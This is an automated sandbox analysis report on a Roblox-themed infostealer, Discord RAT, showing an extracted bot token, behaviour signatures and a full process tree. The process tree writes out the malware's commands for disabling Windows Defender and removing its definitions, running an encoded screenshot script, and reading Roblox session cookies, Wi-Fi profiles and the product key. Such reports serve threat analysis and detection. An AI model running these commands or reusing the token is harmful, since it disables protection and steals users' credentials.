Resubmissions

13-05-2024 22:09

240513-124ajsfe9y 10

13-05-2024 22:01

240513-1xljyafd4w 10

Analysis

  • max time kernel
    192s
  • max time network
    211s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-05-2024 22:01

General

  • Target

    Robloxscript.exe

  • Size

    6.0MB

  • MD5

    1647c032f8e2c490936d578ae193e799

  • SHA1

    a3c57bc5a1021bd1f34eb3f307208b189c8fd9d4

  • SHA256

    99102d69babf9f72ab79ccb7fa3f3c3f33ff9963300c739557d3de7ec847b36d

  • SHA512

    355cd1e95be9c4bfba6302246e25a4de78e63945261724be54faa1fdd05604614e62eb50cef0dd9b4856074f6ffb7c91c9f3851475c564ddf2fae9fc5c3437b9

  • SSDEEP

    98304:Ur+yFEtdFBgfamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R4BMgUd3mszwF:Ur+PFheN/FJMIDJf0gsAGK4R4ug80F

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIzODY2NDMwNzM2NTkwODUyMQ.GDvhgA.XMPH7BZJagiRxu6AdE_1g9HRnMxqmrvHaYqdNA

  • server_id

    1238663060147667046

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
    "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:500
    • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
      "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1360
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:2428
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3680
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4700
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3704
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3112
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4196
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3712
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:60
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3140
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:704
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:816
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2080
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:4360
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4168
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2868
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtb3rhw3\jtb3rhw3.cmdline"
                5⤵
                  PID:3228
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9635.tmp" "c:\Users\Admin\AppData\Local\Temp\jtb3rhw3\CSCB087BE8778A04611BA149B47D8CE718E.TMP"
                    6⤵
                      PID:2548
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:204
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:308
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4136
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3116
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4572
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4496
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1224
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:4180
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:2304
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4800
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:1864
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4688
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:3304
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1360
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:4936
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:2332
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\hNSnJ.zip" *"
                                        3⤵
                                          PID:4604
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI5002\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\hNSnJ.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2996
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:3700
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                                PID:652
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                              3⤵
                                                PID:4356
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  4⤵
                                                    PID:980
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  3⤵
                                                    PID:4416
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      4⤵
                                                        PID:1732
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      3⤵
                                                        PID:1484
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4348
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        3⤵
                                                          PID:312
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            4⤵
                                                            • Detects videocard installed
                                                            PID:1612
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          3⤵
                                                            PID:4800
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4832

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        b33899a3ad59378f79cae6c051d9774c

                                                        SHA1

                                                        96d15df9804383a3aa0d6078be7ab133ffef08cf

                                                        SHA256

                                                        db0352f72e8ab92f4bd63276cfdb52381d2b58c2e1cc2ba99dd544ea41e12f6b

                                                        SHA512

                                                        7126bd179154ede17d2e95c79222196bdd9d8ac5f3db1c1586f0782c1dc7dabbe95f0c08d6730c7b76eca2a65039ef69276a5954e049d5132ab6afcfedc742b8

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        bb6e1d5a07cca47e07d9ce1bfb89bffb

                                                        SHA1

                                                        420c682e8a10191cad7bc5d38736438dc2e7101c

                                                        SHA256

                                                        51179ce535074f31f3b81df24fc81ef676824adc7f93174daa7bfa85e2a1859b

                                                        SHA512

                                                        f76fd83eb7f13857542ab52aa4be912fce47d7b6c15eba418937bc36a5c169dc5ebbdc6ce7e5e74bb03b45a1a9fd72348d54a750853ed545dcbf075213076b54

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        0d96ab560a9f152e4455ae4d8e8287ed

                                                        SHA1

                                                        9fee7215fd0fd375283ab40c6286ce6318b3eabb

                                                        SHA256

